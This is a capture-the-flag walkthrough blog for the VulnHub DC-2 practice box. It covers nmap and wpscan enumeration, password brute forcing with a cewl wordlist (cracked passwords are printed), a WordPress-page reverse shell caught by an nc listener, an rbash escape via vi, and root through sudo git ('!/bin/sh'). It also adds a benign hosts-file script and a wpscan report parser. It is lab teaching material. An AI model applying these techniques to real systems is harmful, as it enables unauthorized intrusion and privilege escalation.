DC-2 Writeup
Hello friends, thank you for reading this blog. This time we complete another boot2root challenge, a box known as "DC-2"; all the credit goes to @DCAU for creating this box. Our challenge is to get root access to this machine. To download it, go to vulnhub.com or https://www.vulnhub.com/?q=dc-2
This is also a beginner-level machine.
Walkthrough steps:
Step 1:
IP Discovery:
nmap -sn 192.168.56.1/24
Step 2:
Network Scanning:
nmap -sC -sV 192.168.56.110
Step 3:
Checking the port 80:
As we can see, port 80 is open, so we can open it in a web browser. Browsing to the IP redirects to the domain http://dc-2, but nothing loads, because that name does not resolve.
To open this domain we need to map it to the IP address in the /etc/hosts file.
nano /etc/hosts
Now the domain will open. As we opened the domain we found WordPress CMS is running.
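To make the hosts-file step repeatable, here is an added shell example (not from the original post) that appends the mapping only if an uncommented entry for the name is not already present, and a small lookup to confirm the mapping afterwards. The hosts-file path is a parameter so the function can be exercised on a scratch copy; on a real system you would pass /etc/hosts and run it as root. The IP and name are the ones from this write-up.

```shell
#!/bin/sh
# Added example, not part of the original post.
# add_host_entry FILE IP NAME: append "IP<TAB>NAME" to FILE unless NAME is
# already mapped on an uncommented line.
add_host_entry() {
    hosts_file="$1"   # e.g. /etc/hosts (a scratch file in the test)
    ip="$2"           # e.g. 192.168.56.110, the DC-2 VM address from the post
    name="$3"         # e.g. dc-2

    # Match a non-comment line where NAME appears as a whole hostname field.
    if grep -Eq "^[^#]*[[:space:]]${name}"'([[:space:]]|$)' "$hosts_file"; then
        echo "entry for ${name} already present in ${hosts_file}"
        return 0
    fi
    printf '%s\t%s\n' "$ip" "$name" >> "$hosts_file"
    echo "added ${ip} ${name} to ${hosts_file}"
}

# lookup_host_entry FILE NAME: print the IP mapped to NAME in FILE (empty if none).
lookup_host_entry() {
    awk -v n="$2" '$1 !~ /^#/ { for (i = 2; i <= NF; i++) if ($i == n) { print $1; exit } }' "$1"
}

# Usage on the real system (as root):
#   add_host_entry /etc/hosts 192.168.56.110 dc-2
#   lookup_host_entry /etc/hosts dc-2
```

Running it twice is safe: the second call reports the entry as already present instead of producing a duplicate line.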
Step 4:
Scanning this WordPress site:
To scan a WordPress site there is a tool built into Kali Linux called wpscan. The command to scan this site is
wpscan --url http://dc-2
The scan output looks like this:
wpscan --url http://dc-2
_______________________________________________________________
[WPScan ASCII-art logo]
WordPress Security Scanner by the WPScan Team
Version 3.8.18
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]n
[+] URL: http://dc-2/ [192.168.56.110]
[+] Started: Fri May 27 06:00:51 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.10 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://dc-2/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
| Found By: Rss Generator (Passive Detection)
| - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
| - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://dc-2/wp-content/themes/twentyseventeen/
| Last Updated: 2022-01-25T00:00:00.000Z
| Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 2.9
| Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Found By: Style (Passive Detection)
| - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <=============================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri May 27 06:00:56 2022
[+] Requests Done: 171
[+] Cached Requests: 5
[+] Data Sent: 39.416 KB
[+] Data Received: 356.633 KB
[+] Memory used: 232.211 MB
[+] Elapsed time: 00:00:05
Looking at this scan result, nothing is directly exploitable.
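Reading wpscan output by eye works for one box, but a practitioner who runs it regularly wants the findings pulled out mechanically. The following Python is an added example, not code from the post or from the WPScan project: it parses the "[+] finding / | detail" block format shown above and triages the findings that matter for hardening (the Insecure core version, XML-RPC reachable, readme.html exposed, outdated theme). The embedded sample is a constructed excerpt modelled on the scan output above, not the full run.

```python
import re
from dataclasses import dataclass, field

# Constructed excerpt modelled on the wpscan output shown in the post.
SAMPLE_WPSCAN_OUTPUT = """\
[+] URL: http://dc-2/ [192.168.56.110]
[+] Started: Fri May 27 06:00:51 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.10 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] WordPress readme found: http://dc-2/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
 | Found By: Rss Generator (Passive Detection)

[+] WordPress theme in use: twentyseventeen
 | Location: http://dc-2/wp-content/themes/twentyseventeen/
 | [!] The version is out of date, the latest version is 2.9
 |
 | Version: 1.2 (80% confidence)

[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Finished: Fri May 27 06:00:56 2022
"""

VERSION_RE = re.compile(r"WordPress version (\d+(?:\.\d+)*) identified \((\w+)")


@dataclass
class Finding:
    """One '[+]' block: its title line and the '|' detail lines under it."""
    title: str
    details: list = field(default_factory=list)

    def confidence(self):
        # wpscan prints "Confidence: NN%" as one of the detail lines.
        for d in self.details:
            m = re.match(r"Confidence:\s*(\d+)%", d)
            if m:
                return int(m.group(1))
        return None


def parse_wpscan(text):
    """Split wpscan's text report into Finding objects."""
    findings, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[+] "):
            current = Finding(line[4:])
            findings.append(current)
        elif line.startswith("|") and current is not None:
            detail = line[1:].strip()
            if detail:                      # skip the bare "|" separator lines
                current.details.append(detail)
        else:
            current = None                  # blank, [i] or [!] line ends the block
    return findings


def core_version(findings):
    """Return (version, status) from the 'WordPress version ... identified' line."""
    for f in findings:
        m = VERSION_RE.search(f.title)
        if m:
            return m.group(1), m.group(2)
    return None


def triage(findings):
    """Map findings to (key, remediation) pairs a site owner should act on."""
    issues = []
    for f in findings:
        m = VERSION_RE.search(f.title)
        if m and m.group(2).lower() == "insecure":
            issues.append(("core-insecure", f"WordPress core {m.group(1)} is flagged Insecure: update core"))
        elif f.title.startswith("XML-RPC seems to be enabled"):
            issues.append(("xmlrpc", "xmlrpc.php is reachable: disable or restrict XML-RPC if unused"))
        elif f.title.startswith("WordPress readme found"):
            issues.append(("readme", "readme.html is exposed: remove it to limit version disclosure"))
        elif f.title.startswith("WordPress theme in use") and any(
                d.startswith("[!] The version is out of date") for d in f.details):
            issues.append(("theme-outdated", "active theme is out of date: update it"))
    return issues


if __name__ == "__main__":
    parsed = parse_wpscan(SAMPLE_WPSCAN_OUTPUT)
    print("core:", core_version(parsed))
    for key, msg in triage(parsed):
        print(f"[{key}] {msg}")
```

The parser treats any line that is not a `[+]` title or a `|` detail as the end of a block, so it copes both with the blank-line-separated layout wpscan prints and with the flattened copy above. Pipe a saved report in (`wpscan --url ... > scan.txt`) and feed the file contents to `parse_wpscan` to get the same triage for any target you are authorised to scan.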
Step 5:
User enumeration:
As we know, a WordPress site has a login page, so it must have at least one user. On a WordPress site we can use wpscan for user enumeration.
wpscan --url http://dc-2 -e u
Step 6:
Brute Forcing for password:
We save these three usernames in a file; in my case I call it username.txt. For the password list I use password.txt, but a normal wordlist will not work here: if you look at the Flag section of the website and read what is written there, the hint is to use the cewl tool to grab all the words available on the website and save them as password.txt.
wpscan --url http://dc-2 -U username.txt -P password.txt
The credentials found are
jerry / adipiscing
tom / parturient
Step 7:
Log in to the WordPress login page with the jerry credentials. Go to the Pages section and then All Pages. There you will find an Add New button that we can use to upload our reverse shell.
Step 8:
Start a nc listener, which will catch the connection from the victim once the page we just published is opened.
Remember that we also obtained passwords for two users, and we can use them to connect through SSH (port 7744).
Step 9:
I was able to log in over SSH as the tom user. Running some commands reports that the shell is rbash, so we need to bypass it before we can run them. I then tried the steps shown in the screenshots below.
Press ENTER
vi
:set shell=/bin/sh
:shell
Now, if you set your system's $PATH in the escaped shell, you will be able to run cd, pwd, cat and the other usual commands, and read the flag with cat.
Step 10:
As the screenshot shows, flag3 hints that we should su to the jerry user.
Step 11:
Now run sudo -l in this jerry shell; it shows that jerry has sudo permission for /usr/bin/git. We can use this permission to get root on the system.
sudo git help config
!/bin/sh
Step 12:
Now you will get the final flag, the root flag.